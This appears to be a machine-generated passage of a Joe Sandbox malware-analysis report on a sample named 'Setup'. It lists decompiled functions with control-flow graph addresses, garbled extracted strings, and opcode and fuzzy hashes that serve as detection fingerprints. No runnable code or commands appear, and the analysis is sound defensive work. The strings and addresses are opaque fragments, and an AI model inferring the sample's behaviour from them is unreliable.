                                                                                                                                                                                                                                                              • String ID: $#$#$$$%cp$'$)$*$*$+$-$0$0$1$2$2$@$@$B$D$D$D$D$F$F$H$H$H$J$J$J$J$K$L$L$N$N$O$P$P$P$R$R$T$T$T$U$V$V$V$W$X$X$Z$Z$[$Ky$\$\$]$^$^$`$`$b$d$d$e$f$h$h$j$j$l$n$p$q$q$r$t$t$v$x$z$|$}$~
                                                                                                                                                                                                                                                              • API String ID: 0-2887741200
                                                                                                                                                                                                                                                              • Opcode ID: 580b4cde6b63d2dff4980e5e54c8b8d4fa16d9793e158013a6970ccc2d0448f5
                                                                                                                                                                                                                                                              • Instruction ID: 8a2b28f83b82dd8dffd9772dcc37ec0bfdd60c94e747435be521f401af903baa
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 580b4cde6b63d2dff4980e5e54c8b8d4fa16d9793e158013a6970ccc2d0448f5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D923BE3250C7D08BD3368B3888543AFBBD5ABD6324F098A6DD5E98B3D2D6798405DB43
                                                                                                                                                                                                                                                              Function 0205A946 Relevance: 21.5, Strings: 17, Instructions: 209COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 884 205a946-205a969 885 205a96b-205a96e 884->885 886 205a990-205a9ac 885->886 887 205a970-205a98e 885->887 888 205a9ae-205a9b1 886->888 887->885 889 205a9d3-205a9f7 888->889 890 205a9b3-205a9d1 888->890 891 205a9f9-205a9fc 889->891 890->888 892 205aa45-205aa4b 891->892 893 205a9fe-205aa43 891->893 894 205aa51-205aa6d 892->894 895 205abca 892->895 893->891 896 205aa6f-205aa72 894->896 897 205abcc-205abce 895->897 898 205aa74-205aaa1 896->898 899 205aaa3-205aaa7 896->899 900 205abd4-205abe0 897->900 898->896 899->895 901 205aaad-205aac9 899->901 902 205aacb-205aace 901->902 903 205aaf6-205aafa 902->903 904 205aad0-205aaf4 902->904 903->895 905 205ab00-205ab1c 903->905 904->902 906 205ab1e-205ab21 905->906 907 205ab23-205ab38 906->907 908 205ab3a-205ab3e 906->908 907->906 908->895 909 205ab44-205ab5f 908->909 910 205ab61-205ab64 909->910 911 205ab66-205abbc 910->911 912 205abbe-205abc6 910->912 911->910 912->897 913 205abc8-205abd2 912->913 913->900
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: /$0$0$1$1$2$2$B$F$X$[$[$^$s$s$t$|WL}
                                                                                                                                                                                                                                                              • API String ID: 0-2661351163
                                                                                                                                                                                                                                                              • Opcode ID: 4ad607f0fd3734a1e1a4529355bdbb13b264922a835e985a3c30ece3c5d024a0
                                                                                                                                                                                                                                                              • Instruction ID: 41ec0f62c406d84f481bb21ea99daa2932fff0b0048845aefd74adfa92582527
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ad607f0fd3734a1e1a4529355bdbb13b264922a835e985a3c30ece3c5d024a0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7771F61261C7E14EE3028638485425FAFD24BE3124F1D8FADE8E5873C3C565C90AD3A3
                                                                                                                                                                                                                                                              Function 020318CC Relevance: 18.4, Strings: 14, Instructions: 911COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 915 20318cc-20318e4 916 20318e6-20318e9 915->916 917 2031966-2031985 call 2023666 916->917 918 20318eb-2031964 916->918 921 203198b-20319a3 917->921 922 2031c1f 917->922 918->916 924 20319a5-20319a8 921->924 923 2033eaa 922->923 925 2033eac-2033eaf call 2023766 923->925 926 20319aa-2031a0c 924->926 927 2031a0e-2031a2d call 2023666 924->927 935 2030c85-2030caf call 2023776 925->935 936 2030c7e-2033ec0 925->936 926->924 927->922 932 2031a33-2031a4b 927->932 934 2031a4d-2031a50 932->934 937 2031a52-2031a89 934->937 938 2031a8b-2031aaa call 2023666 934->938 944 2030cb3-2030cb6 935->944 937->934 938->922 945 2031ab0-2031ac8 938->945 946 2030d02-2030d2c call 2023666 944->946 947 2030cb8-2030d00 944->947 948 2031aca-2031acd 945->948 954 2030d30 946->954 955 2030d2e-2030d4f 946->955 947->944 950 2031afa-2031b19 call 2023666 948->950 951 2031acf-2031af8 948->951 950->922 959 2031b1f-2031b37 950->959 951->948 954->925 958 2030d53-2030d56 955->958 961 2030dea-2030e3b call 20231a6 958->961 962 2030d5c-2030de5 958->962 960 2031b39-2031b3c 959->960 963 2031b3e-2031b6a 960->963 964 2031b6c-2031b8b call 2023666 960->964 961->923 969 2030e41 961->969 962->958 963->960 964->922 970 2031b91-2031bb7 964->970 969->923 971 2031bb9-2031bbc 970->971 972 2031be9-2031c17 call 2023666 971->972 973 2031bbe-2031be7 971->973 972->923 976 2031c1d-2031c3c 972->976 973->971 978 2031c3e-2031c41 976->978 979 2031c43-2031c5e 978->979 980 2031c60-2031c93 call 20230a6 978->980 979->978 983 2031c95-2031c98 980->983 984 2031cb1-2031ce4 call 20230a6 983->984 985 2031c9a-2031caf 983->985 988 2031ce6-2031ce9 984->988 985->983 989 2031d16-2031d49 call 20232b6 988->989 990 2031ceb-2031d14 988->990 993 2031d4b-2031d4e 989->993 990->988 994 2031d50-2031d74 993->994 995 2031d76-2031da9 call 20230a6 993->995 994->993 998 2031dab-2031dae 995->998 999 2031db0-2031dda 998->999 1000 2031ddc-2031e55 call 20231a6 998->1000 999->998 1003 2031e57-2031e5a 1000->1003 1004 2031ebe-2031f40 call 20231a6 call 2036316 1003->1004 1005 2031e5c-2031ebc 1003->1005 1010 2031f42 1004->1010 1011 2031f44-2031fda call 2029716 call 202c0d6 call 205e6c6 call 2029726 call 205e906 1004->1011 1005->1003 1010->1011 1022 2031fe3-2032023 1011->1022 1023 2031fdc-2031fde 1011->1023 1025 2032025-2032028 1022->1025 1026 20326c9-20326d5 call 205ea26 1023->1026 1027 2032056-203205d 1025->1027 1028 203202a-2032054 1025->1028 1026->923 1029 203205f-203206a 1027->1029 1028->1025 1031 2032071-2032088 1029->1031 1032 203206c 1029->1032 1035 203208a-20320e2 1031->1035 1036 203208c-2032097 1031->1036 1034 20320f5-20320f8 1032->1034 1040 20320fa 1034->1040 1041 20320fc-203212a 1034->1041 1038 20320e4-20320e9 1035->1038 1036->1038 1039 2032099-20320e0 call 2060116 1036->1039 1043 20320eb 1038->1043 1044 20320ed-20320f0 1038->1044 1039->1038 1040->1041 1045 203212c-203212f 1041->1045 1043->1034 1044->1029 1046 2032135-20321c9 1045->1046 1047 20321ce-20321e2 1045->1047 1046->1045 1049 20326c7 1047->1049 1050 20321e8-2032289 call 205e676 1047->1050 1049->1026 1053 203228b-203228e 1050->1053 1054 2032290-20322ba 1053->1054 1055 20322bc-20322c3 1053->1055 1054->1053 1056 20322c5-20322cb 1055->1056 1057 20322d7-20322ec 1056->1057 1058 20322cd-20322d2 1056->1058 1060 20322f0-20322fb 1057->1060 1061 20322ee 1057->1061 1059 203235d-2032360 1058->1059 1062 2032362 1059->1062 1063 2032364-2032367 1059->1063 1064 203234e-2032351 1060->1064 1065 20322fd-2032349 call 2060116 1060->1065 1061->1064 1062->1063 1068 20326ad-20326c3 call 205e696 1063->1068 1069 203236d-203239c call 2036316 1063->1069 1066 2032353-2032356 1064->1066 1067 203235b 1064->1067 1065->1064 1066->1056 1067->1059 1068->1049 1076 20323a0-20323f4 call 2029716 call 202c0d6 1069->1076 1077 203239e 1069->1077 1082 20323f6-20323ff 1076->1082 1077->1076 1083 2032401-2032407 1082->1083 1084 2032410-2032412 1082->1084 1085 203240b-203240e 1083->1085 1086 2032409 1083->1086 1087 2032414-203248a 1084->1087 1085->1082 1086->1087 1088 203248e-20324f2 call 2029716 call 2036376 call 202b486 call 2029726 1087->1088 1089 203248c 1087->1089 1099 20324f6-2032541 call 2029716 call 205c466 call 2029726 call 2036316 1088->1099 1100 20324f4 1088->1100 1089->1088 1109 2032543 1099->1109 1110 2032545-203258b call 2029716 call 202c0d6 call 202a3a6 1099->1110 1100->1099 1109->1110 1117 203258d-203259e call 2023766 1110->1117 1120 20325a0-20326a8 call 2029726 * 2 call 202af96 call 202a486 1117->1120 1121 20325a5-20325be call 2023746 call 2023186 1117->1121 1120->1068 1130 20325c0 1121->1130 1131 20325c5-20325e9 call 2036316 1121->1131 1134 203266d-2032670 1130->1134 1139 20325eb 1131->1139 1140 20325ed-203266b call 2029716 call 202c0d6 call 2043526 call 2029726 1131->1140 1134->1117 1139->1140 1140->1134
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: &$&$)$+$/$5$6$;$;$=$C$M$M$V
                                                                                                                                                                                                                                                              • API String ID: 0-1573904596
                                                                                                                                                                                                                                                              • Opcode ID: 3babcfd77a9c43872817e20e023e40d4e8e1275384241b6f8e243a872365ba1a
                                                                                                                                                                                                                                                              • Instruction ID: 70a322f14f4d72553a20af3d56e5914fa1dbeaa5dcda819209a772b6ba7c64f9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3babcfd77a9c43872817e20e023e40d4e8e1275384241b6f8e243a872365ba1a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2182B07150C7908FD325DF38C4943AEBBE6AB89320F198A6ED8D9873C1D6788945DB43
                                                                                                                                                                                                                                                              Function 02040556 Relevance: 17.2, Strings: 13, Instructions: 944COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: "-&4$"2,,$1660$3V_y$6$=kX^$GXWY$Kz$T S3$gD$lA*=$w,!>$x|ls
                                                                                                                                                                                                                                                              • API String ID: 0-2433764711
                                                                                                                                                                                                                                                              • Opcode ID: adf049959d03f121f274ef9b3f934a1a7aec0ad2ee27bcb2414d3143df8b966d
                                                                                                                                                                                                                                                              • Instruction ID: 40fc8dfcfe0efac5ec96221a6a545e6df6c714dc22aa67bf99f23053c140338d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: adf049959d03f121f274ef9b3f934a1a7aec0ad2ee27bcb2414d3143df8b966d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0625AB050C3918BC72ACF28885066EFFE2AF96314F18C67DE9E557392DB318509DB52
                                                                                                                                                                                                                                                              Function 020326DA Relevance: 15.9, Strings: 12, Instructions: 903COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1336 20326da-20326f2 1337 20326f4-20326f7 1336->1337 1338 203272a-2032758 call 20230a6 1337->1338 1339 20326f9-2032728 1337->1339 1342 203275a-203275d 1338->1342 1339->1337 1343 2032763-203282c 1342->1343 1344 2032831-2032866 call 20230a6 1342->1344 1343->1342 1347 203286a-203286c 1344->1347 1348 2032868-2032892 call 2036316 1344->1348 1350 2033407 1347->1350 1356 2032896-20328d7 call 2029716 call 202c0d6 1348->1356 1357 2032894 1348->1357 1351 2033eaa 1350->1351 1353 2033eac-2033eaf call 2023766 1351->1353 1363 2030c85-2030caf call 2023776 1353->1363 1364 2030c7e-2033ec0 1353->1364 1368 20328d9-20328dc 1356->1368 1357->1356 1372 2030cb3-2030cb6 1363->1372 1370 20328e2-2032967 1368->1370 1371 203296c-2032990 call 20230a6 1368->1371 1370->1368 1378 2032992-20329b3 call 2036316 1371->1378 1379 20329e0-2032a11 call 2036316 1371->1379 1374 2030d02-2030d2c call 2023666 1372->1374 1375 2030cb8-2030d00 1372->1375 1383 2030d30 1374->1383 1384 2030d2e-2030d4f 1374->1384 1375->1372 1391 20329b7-20329db call 2029716 call 202c0d6 1378->1391 1392 20329b5 1378->1392 1389 2032a13 1379->1389 1390 2032a15-2032ab8 call 2029716 call 202c0d6 1379->1390 1383->1353 1388 2030d53-2030d56 1384->1388 1393 2030dea-2030e3b call 20231a6 1388->1393 1394 2030d5c-2030de5 1388->1394 1389->1390 1406 2032aba-2032abd 1390->1406 1391->1379 1392->1391 1393->1351 1403 2030e41 1393->1403 1394->1388 1403->1351 1407 2032b1f-2032b35 1406->1407 1408 2032abf-2032b1d 1406->1408 1409 2032b52-2032b6e 1407->1409 1410 2032b37-2032b4d call 2029726 1407->1410 1408->1406 1411 2032b72-2032bd4 call 2029716 1409->1411 1412 2032b70 1409->1412 1410->1350 1420 2032bd6-2032bf8 call 2029726 * 2 1411->1420 1421 2032bfd-2032c26 call 2029726 1411->1421 1412->1411 1435 2033405 1420->1435 1428 2032c28-2032c2b 1421->1428 1430 2032c44-2032c68 call 20230a6 1428->1430 1431 2032c2d-2032c42 1428->1431 1437 2032d06-2032d1e 1430->1437 1438 2032c6e-2032cd6 call 2036316 1430->1438 1431->1428 1435->1350 1439 2032d20-2032d23 1437->1439 1445 2032cda-2032d03 call 2029716 call 202c0d6 1438->1445 1446 2032cd8 1438->1446 1441 2032d25-2032d4d 1439->1441 1442 2032d4f-2032d95 call 20233b6 1439->1442 1441->1439 1450 2032d97-2032d9a 1442->1450 1445->1437 1446->1445 1452 2032da0-2032eb5 1450->1452 1453 2032eba-2032ede call 20232b6 1450->1453 1452->1450 1457 20332b4-2033353 call 202a3a6 call 2037256 call 202af96 1453->1457 1458 2032ee4-2032f20 call 2036776 call 2023766 1453->1458 1472 2033355-203336a 1457->1472 1473 203338f-20333c2 call 2029726 * 2 1457->1473 1468 2032f22 1458->1468 1469 2032f24-2032f47 call 2029716 1458->1469 1468->1469 1480 2032f75-2032f77 1469->1480 1481 2032f49-2032f54 1469->1481 1478 2033384-203338c call 2029726 1472->1478 1479 203336c-2033370 1472->1479 1503 20333d7-20333e4 1473->1503 1504 20333c4-20333d5 call 2029726 1473->1504 1478->1473 1483 2033372-2033380 call 20365b6 1479->1483 1486 2032f79-2032f81 1480->1486 1492 2032f56-2032f62 call 2036436 1481->1492 1501 2033382 1483->1501 1488 2032f83-2032f85 1486->1488 1489 2032f8a-2032fd1 call 2023776 1486->1489 1488->1457 1505 2032fd3-2032fd6 1489->1505 1506 2032f64-2032f73 1492->1506 1501->1478 1510 20333e6-20333f7 call 2029726 1503->1510 1511 20333f9-2033400 call 202a486 1503->1511 1504->1503 1508 2033031-2033078 call 20230a6 1505->1508 1509 2032fd8-203302f 1505->1509 1506->1480 1519 203307a-203307d 1508->1519 1509->1505 1510->1511 1511->1435 1521 20330d5-2033126 call 20230a6 1519->1521 1522 203307f-20330d3 1519->1522 1525 203312a-203312d 1521->1525 1522->1519 1526 203312f-203318a 1525->1526 1527 203318c-20331e0 call 20233b6 1525->1527 1526->1525 1530 20331e4-20331e7 1527->1530 1531 20331e9-203321a 1530->1531 1532 203321c-20332af call 20233b6 call 2036456 1530->1532 1531->1530 1532->1486
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: $$$+$4$C$D$E$Q$R$S$d$~
                                                                                                                                                                                                                                                              • API String ID: 0-3353130204
                                                                                                                                                                                                                                                              • Opcode ID: 834423760a171886d2f265adfd9c0b98d8bb2a844679e98d0fb0a64bd4d72020
                                                                                                                                                                                                                                                              • Instruction ID: d6d433378ff2d5c9cea9210a0f3d6b4138aec02cadffe1b0b2cc7663c3bb67f6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 834423760a171886d2f265adfd9c0b98d8bb2a844679e98d0fb0a64bd4d72020
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E72C872A0C7908FD325DF38C89439EBBD56BC5320F198A6ED8E9D73C1D67488459B42
                                                                                                                                                                                                                                                              Function 02046B96 Relevance: 15.4, Strings: 12, Instructions: 418COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1537 2046b96-2046d61 1538 2046d66-2046db3 1537->1538 1538->1538 1539 2046db5-204705f 1538->1539 1540 2047066-2047099 1539->1540 1540->1540 1541 204709b-2047285 1540->1541 1542 2047286-204729c 1541->1542 1542->1542 1543 204729e-2047488 1542->1543 1544 2047496-20474bb 1543->1544 1544->1544 1545 20474bd-20476b5 1544->1545 1546 20476b6-20476db 1545->1546 1546->1546 1547 20476dd-2047742 1546->1547
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: AC$CG$H7$Jw$Tv%t$WL$de$+%$IK$MO$uw$zx
                                                                                                                                                                                                                                                              • API String ID: 0-3915312366
                                                                                                                                                                                                                                                              • Opcode ID: 22cb1d7f73685dfc8f92ccdc369170f395ad8c892094d57c2505d72ccd2aa43c
                                                                                                                                                                                                                                                              • Instruction ID: 6ca39b5d7c7bf37238473769a5f6e60d76cd59ac684c0eb6d6aa736534ecdb77
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 22cb1d7f73685dfc8f92ccdc369170f395ad8c892094d57c2505d72ccd2aa43c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8532F9B520D7958AD330CF55D402BCFBAF2EB92304F008D1DC5D96B206DBB5864A8B9B
                                                                                                                                                                                                                                                              Function 0202AB26 Relevance: 15.4, Strings: 12, Instructions: 409COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1548 202ab26-202ab91 1549 202ab96-202abb7 1548->1549 1549->1549 1550 202abb9-202abc5 1549->1550 1551 202abc6-202abe5 1550->1551 1551->1551 1552 202abe7-202ac67 1551->1552 1553 202ac76-202ac93 1552->1553 1553->1553 1554 202ac95-202aca5 1553->1554 1555 202aca6-202acc0 1554->1555 1555->1555 1556 202acc2-202accb 1555->1556 1557 202ace1-202acee 1556->1557 1558 202accd-202acd5 1556->1558 1560 202acf0-202acf5 1557->1560 1561 202ad01-202ad0b 1557->1561 1559 202acd6-202acdf 1558->1559 1559->1557 1559->1559 1562 202acf6-202acff 1560->1562 1563 202ad21-202ad2d 1561->1563 1564 202ad0d-202ad11 1561->1564 1562->1561 1562->1562 1566 202ad41-202ad4b 1563->1566 1567 202ad2f-202ad30 1563->1567 1565 202ad16-202ad1f 1564->1565 1565->1563 1565->1565 1569 202ad73 1566->1569 1570 202ad4d-202ad58 1566->1570 1568 202ad36-202ad3f 1567->1568 1568->1566 1568->1568 1571 202ad7a-202ad84 1569->1571 1572 202ad66-202ad6f 1570->1572 1573 202ada1-202addf 1571->1573 1574 202ad86-202ad8a 1571->1574 1572->1572 1575 202ad71 1572->1575 1577 202ade1-202adea 1573->1577 1578 202ae0c-202ae25 1573->1578 1576 202ad96-202ad9f 1574->1576 1575->1571 1576->1573 1576->1576 1579 202adef-202adfa 1577->1579 1580 202adec-202aded 1577->1580 1581 202ae26-202ae90 1578->1581 1582 202ae01-202ae09 1579->1582 1583 202adfc-202adff 1579->1583 1580->1578 1581->1581 1584 202ae92-202aea9 1581->1584 1582->1578 1583->1578 1585 202aeb6-202af0e 1584->1585 1585->1585 1586 202af10-202af17 1585->1586 1587 202af33 1586->1587 1588 202af19-202af21 1586->1588 1590 202af37-202af40 1587->1590 1589 202af26-202af2f 1588->1589 1589->1589 1591 202af31 1589->1591 1592 202af42-202af45 1590->1592 1593 202af51-202af5b 1590->1593 1591->1590 1594 202af46-202af4f 1592->1594 1595 202af71-202af85 1593->1595 1596 202af5d-202af61 1593->1596 1594->1593 1594->1594 1597 202af66-202af6f 1596->1597 1597->1595 1597->1597
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: -(X0$-,$046=$<d0q$B<@=$E~DA$KumW$Up$^jm#$cURr$p$vM{z
                                                                                                                                                                                                                                                              • API String ID: 0-261454887
                                                                                                                                                                                                                                                              • Opcode ID: 9cfbe5d0dcf48ca78acd10c6400799df5c8f3d4f4692196ad975901a62baa90c
                                                                                                                                                                                                                                                              • Instruction ID: 293c2a5665bd92338361c3e3610e52f5039317f27c4f4a9b1beb5c15c21d1174
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9cfbe5d0dcf48ca78acd10c6400799df5c8f3d4f4692196ad975901a62baa90c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ADC147B264C3A08BC316CF74889076BFFE19F93205F0889ADE4D55B242DB39850ED796
                                                                                                                                                                                                                                                              Function 02030E4A Relevance: 11.9, Strings: 9, Instructions: 693COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1599 2030e4a-2030e62 1600 2030e64-2030e67 1599->1600 1601 2030ea9-2030ec8 call 2023666 1600->1601 1602 2030e69-2030ea7 1600->1602 1605 20311c8 1601->1605 1606 2030ece-2030efc 1601->1606 1602->1600 1607 2033eaa 1605->1607 1608 2030efe-2030f01 1606->1608 1609 2033eac-2033eaf call 2023766 1607->1609 1610 2030f03-2030f33 1608->1610 1611 2030f35-2030f5b 1608->1611 1620 2030c85-2030caf call 2023776 1609->1620 1621 2030c7e-2033ec0 1609->1621 1610->1608 1613 2030f5d-2030f60 1611->1613 1615 2030f62-2030fd3 1613->1615 1616 2030fd5-2031000 call 2023666 1613->1616 1615->1613 1622 2031002 1616->1622 1623 2031007-203101f 1616->1623 1630 2030cb3-2030cb6 1620->1630 1622->1605 1626 2031021-2031024 1623->1626 1628 2031053-2031072 call 2023666 1626->1628 1629 2031026-2031051 1626->1629 1628->1605 1636 2031078-2031090 1628->1636 1629->1626 1632 2030d02-2030d2c call 2023666 1630->1632 1633 2030cb8-2030d00 1630->1633 1639 2030d30 1632->1639 1640 2030d2e-2030d4f 1632->1640 1633->1630 1638 2031092-2031095 1636->1638 1641 20310f1-2031115 call 2023666 1638->1641 1642 2031097-20310ef 1638->1642 1639->1609 1644 2030d53-2030d56 1640->1644 1650 2031117 1641->1650 1651 203111c-2031142 1641->1651 1642->1638 1646 2030dea-2030e3b call 20231a6 1644->1646 1647 2030d5c-2030de5 1644->1647 1646->1607 1656 2030e41 1646->1656 1647->1644 1650->1605 1652 2031144-2031147 1651->1652 1654 2031183-20311c0 call 2023666 1652->1654 1655 2031149-2031181 1652->1655 1654->1607 1659 20311c6-20311e5 1654->1659 1655->1652 1656->1607 1661 20311e7-20311ea 1659->1661 1662 2031211-2031244 call 20230a6 1661->1662 1663 20311ec-203120f 1661->1663 1666 2031246-2031249 1662->1666 1663->1661 1667 2031272-20312a5 call 20232b6 1666->1667 1668 203124b-2031270 1666->1668 1671 20312a7-20312aa 1667->1671 1668->1666 1672 2031305-2031338 call 20230a6 1671->1672 1673 20312ac-2031303 1671->1673 1676 203133a-203133d 1672->1676 1673->1671 1677 203133f-203136a 1676->1677 1678 203136c-20313e5 call 20231a6 1676->1678 1677->1676 1681 20313e7-20313ea 1678->1681 1682 203141c-2031498 call 20231a6 1681->1682 1683 20313ec-203141a 1681->1683 1686 203149a-203149d 1682->1686 1683->1681 1687 20314d4-2031539 call 20233b6 call 2036316 1686->1687 1688 203149f-20314d2 1686->1688 1693 203153b 1687->1693 1694 203153d-20315e0 call 2029716 call 202c0d6 1687->1694 1688->1686 1693->1694 1700 20315e2-20315e5 1694->1700 1701 20315e7-203161d 1700->1701 1702 203161f-2031631 1700->1702 1701->1700 1703 2031633-2031648 call 2029726 1702->1703 1704 203164d-203166a 1702->1704 1712 20318c7 1703->1712 1706 203166e-20316d5 call 2029716 1704->1706 1707 203166c 1704->1707 1714 20316f1-2031748 call 2029726 call 2036316 1706->1714 1715 20316d7-20316ec call 2029726 1706->1715 1707->1706 1712->1607 1727 203174a 1714->1727 1728 203174c-2031790 call 2029716 call 202c0d6 call 202a3a6 1714->1728 1726 20318c5 1715->1726 1726->1712 1727->1728 1735 2031797-20317a1 call 2023766 1728->1735 1738 20317a3-20318c0 call 2029726 * 2 call 202af96 call 202a486 1735->1738 1739 20317a8-20317c1 call 2023746 call 2023186 1735->1739 1738->1726 1748 20317c3 1739->1748 1749 20317c8-20317ec call 2036316 1739->1749 1752 2031873-2031880 1748->1752 1756 20317f0-2031871 call 2029716 call 202c0d6 call 2043526 call 2029726 1749->1756 1757 20317ee 1749->1757 1752->1735 1756->1752 1757->1756
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: $5$E$G$Z$[$n$r$u
                                                                                                                                                                                                                                                              • API String ID: 0-2784298394
                                                                                                                                                                                                                                                              • Opcode ID: 6470f8f5d99695c76714c72dcebd137a25efcca86b6d7e00e90e01edcd019a4c
                                                                                                                                                                                                                                                              • Instruction ID: f1a665a6d65b051050d4b349862d2bdad44ce79905d10daad9e3205747442b9d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6470f8f5d99695c76714c72dcebd137a25efcca86b6d7e00e90e01edcd019a4c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97528E7260C7908FD325DB3884553AFFBE6AB89320F194E6ED8D983381D6788945DB43
                                                                                                                                                                                                                                                              Function 02043C46 Relevance: 11.8, Strings: 9, Instructions: 568COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
